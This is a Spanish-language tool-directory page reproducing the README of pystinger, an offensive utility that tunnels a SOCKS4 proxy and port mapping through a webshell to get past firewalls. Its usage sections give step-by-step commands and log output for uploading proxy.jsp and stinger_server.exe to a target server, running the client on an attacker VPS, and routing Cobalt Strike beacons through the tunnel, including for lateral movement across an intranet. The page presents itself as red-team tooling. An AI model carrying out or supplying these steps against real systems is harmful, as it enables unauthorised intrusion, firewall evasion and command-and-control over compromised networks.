Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pystinger — Eludir el firewall para el reenvío de tráfico mediante webshell | Kitploit
Herramientas/GitHubGitHub/funnywolf/pystinger
Frameworks de ExploitsGeneración de PayloadsEvasión de IDS/IPSMovimiento LateralExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubfunnywolf/pystinger

pystinger

Eludir el firewall para el reenvío de tráfico mediante webshell

Ver Repositorio
1.4k204hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

pystinger

English | 简体中文

Pystinger implementa proxy SOCK4 y mapeo de puertos a través de webshell.

Puede ser usado directamente por metasploit-framework, viper, cobalt strike para la conexión de sesiones.

Pystinger está desarrollado en python, y actualmente soporta tres scripts de proxy: php, jsp(x) y aspx.

Uso

Supongamos que el nombre de dominio del servidor es http://example.com:8080. La dirección IP de la intranet del servidor es 192.168.3.11

Proxy SOCK4

  • Sube proxy.jsp al servidor objetivo y asegúrate de que http://example.com:8080/proxy.jsp sea accesible; la página devuelve UTF-8.
  • Sube stinger_server.exe al servidor objetivo. En AntSword ejecuta el comando start D:/XXX/stinger_server.exe para iniciar pystinger-server.

No ejecutes D:/xxx/singer_server.exe directamente, ya que causará una desconexión TCP.

  • Ejecuta ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 en tu VPS.
  • Verás la siguiente salida:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Ahora has iniciado un proxy socks4a en el VPS 127.0.0.1:60000 para la intranet de example.com.
  • El servidor objetivo (example.com) 127.0.0.1:60020 ha sido mapeado al VPS 127.0.0.1:60020.

Conexión de beacon de cobaltstrike para un solo objetivo

  • Sube proxy.jsp al servidor objetivo y asegúrate de que http://example.com:8080/proxy.jsp sea accesible; la página devuelve UTF-8.
  • Sube stinger_server.exe al servidor objetivo. En AntSword ejecuta el comando start D:/XXX/stinger_server.exe para iniciar pystinger-server.

No ejecutes D:/xxx/singer_server.exe directamente, ya que causará una desconexión TCP.

  • Ejecuta ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 en tu VPS.
  • Verás la siguiente salida:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Agrega un listener en cobaltstrike. El puerto del listener es 60020 (puerto Handler/LISTEN en RAT CONFIG de la salida), la dirección del listener es 127.0.0.1.
  • Genera el payload, súbelo al objetivo y ejecútalo.

Conexión de beacon de cobaltstrike para múltiples objetivos

  • Sube proxy.jsp al servidor objetivo y asegúrate de que http://example.com:8080/proxy.jsp sea accesible; la página devuelve UTF-8.
  • Sube stinger_server.exe al servidor objetivo. En AntSword ejecuta el comando start D:/XXX/stinger_server.exe 192.168.3.11 para iniciar pystinger-server (192.168.3.11 es la dirección IP de la intranet del objetivo).

192.168.3.11 se puede cambiar a 0.0.0.0

  • Ejecuta ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 en tu VPS.
  • Verás la siguiente salida:
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Agrega un listener en cobaltstrike. El puerto del listener es 60020 (puerto Handler/LISTEN en RAT CONFIG de la salida), la dirección del listener es 192.168.3.11.
  • Genera el payload, súbelo al objetivo y ejecútalo.
  • Al moverse lateralmente a otros hosts, puedes apuntar el payload a 192.168.3.11:60020 para que el beacon se conecte.

Cabecera personalizada y proxy

  • Si el webshell necesita configurar cookie o autorización, la cabecera de la solicitud se puede configurar mediante el parámetro --header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • Si el webshell necesita ser accedido a través de un proxy, puedes configurar el proxy mediante --proxy --proxy "socks5:127.0.0.1:1081"

Herramientas relacionadas

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

Probado

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

Registro de actualizaciones

2.0 Fecha de actualización: 2019-09-29

  • El servicio de proxy Socks4 se traslada al cliente

2.1 Fecha de actualización: 2020-01-07

  • Soporte para conexión en cobaltstrike (mapeo de puertos)

El desarrollo cuenta con el apoyo del software de jetbrains.
https://www.jetbrains.com/?from=pystinger

Descargar herramienta